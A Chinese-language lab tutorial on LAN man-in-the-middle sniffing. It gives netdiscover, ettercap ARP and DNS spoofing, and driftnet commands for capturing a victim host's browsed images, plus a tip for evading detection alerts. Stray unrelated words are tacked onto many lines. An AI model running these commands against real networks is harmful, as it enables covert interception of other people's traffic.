前言:vim
因爲在局域網中,網關會不斷地發送 ARP 數據包詢問當前是否有新的客戶端上線,若是咱們能夠欺騙當前局域網網段下的主機,數組
把咱們當成網關地址,而且咱們把欺騙的流量轉發到真正的網關地址,這樣咱們就能夠嗅探到別人的信息瀏覽器
實驗環境:服務器
一、虛擬機 A(kali)網絡
二、實驗主機 B(win 10)工具
三、保證虛擬機和主機在同一網段,方法在上一篇有寫ui
實驗步驟:spa
一、kali 裏使用 netdiscover -i eth0 [-r range...] 來獲取目標主機的 IP 地址,這裏直接使用主機 B 的 IP 和網關3d
二、kali 終端使用 ettercap -i eth0 -Tq -M arp:remote /// /// 來進行流量欺騙,前一個 /// 爲 B 的 IP,後者爲網關code
注:/// 的完整寫法爲 MAC/IPs/IPv6/PORTs,默認爲所有,MAC 爲物理地址,IPs 爲 IPv4,PORTs 爲端口號
若 ettercap 操做失敗,須要咱們對其進行提權
修改 /etc/ettercap/etter.conf 文件,將 ec_uid 和 ec_gid 的值改成 0,可使用 leafpad、vim 等進行操做
三、打開一個新的終端,經過 driftnet -i eth0 -a -d dir 來把 B(目標主機)瀏覽的圖片保存在目錄 dir 裏,也能夠經過 -b 彈窗直接查看瀏覽的圖片
四、打開主機 B 的瀏覽器查看圖片(須要 http 的)
五、在 kali 裏打開相應文件夾,查看裏面的內容
擴展:
一、netdiscover:
a、基於 ARP 協議
b、主動或被動地發現WIFI或交換網絡的主機
c、經常使用參數選項:
-i :接口。選擇你監控的接口,好比eth0
-r :range 好比192.168.0.0/24(/24 表示網絡號爲 24 位)
-l :從文件讀取range列表
-p :被動模式
-t :每一個ARP請求之間等待時長,單位爲毫秒。這個能夠用來規避檢測系統的告警
-c :對每一個IP發多少個探針
-P :輸出形式更適合重定向到一個文件中。
注:具體可使用 man netdiscover 或 netdiscover -h 來查詢詳細操做
ARP 協議是將 IP 地址轉換爲 MAC 地址(物理地址)地網絡協議
局域網中主機的通信是經過 MAC 地址來實現的,區分 IPv4 裏的網絡號和主機號
二、ettercap [OPTIONS] [TARGET1] [TARGET2]:
a、兩種運行方式:UNIFIED 方式是以中間人方式嗅探;BRIDGED 方式是在雙網卡狀況下,嗅探兩塊網卡之間的數據包
b、經常使用參數:
-i :指定接口
-T :文本模式,常配合 -q 安靜模式使用,-s 表示加載腳本
-M :指定中間人模式
·ARP 欺騙:arp:remote(雙向)、arp:oneway(單向,欺騙目標一到目標二的通信)
·ICMP 欺騙:icmp:(MAC/IP)
·DHCP 欺騙:dhcp:(ip_pool/netmask/dns)
如:-M dhcp:/255.255.255.0/192.168.0.1 不提供 IP 地址,只欺騙目標子網掩碼和 DNS 服務器
c、常見參數組合:
ARP 毒化 eth0 所在的網段,安靜模式文本顯示:ettercap -Tqi eth0 -M ARP /// ///
對 192.168.1.120 進行 DNS 欺騙,使用默認網卡 eth0,文本模式安靜顯示:ettercap -Tq -P dns_spoof -M arp:remote /192.168.1.120// ///
三、driftnet [options] [filter code]:
a、driftnet 是一款使用簡單的圖片捕獲工具,能夠很方便的在網絡數據包中抓取圖片
b、參數命令:
-b :捕獲到新的圖片時發出嘟嘟聲
-i :選擇監聽接口
-f:讀取一個指定 pcap 數據包中的圖片
-p :不讓所監聽的接口使用混雜模式
-a :後臺模式,將捕獲的圖片保存到目錄中(不會顯示在屏幕上)
-m :指定保存圖片數的數目
-d :指定保存圖片的路徑(目錄)
-x:指定保存圖片的前綴名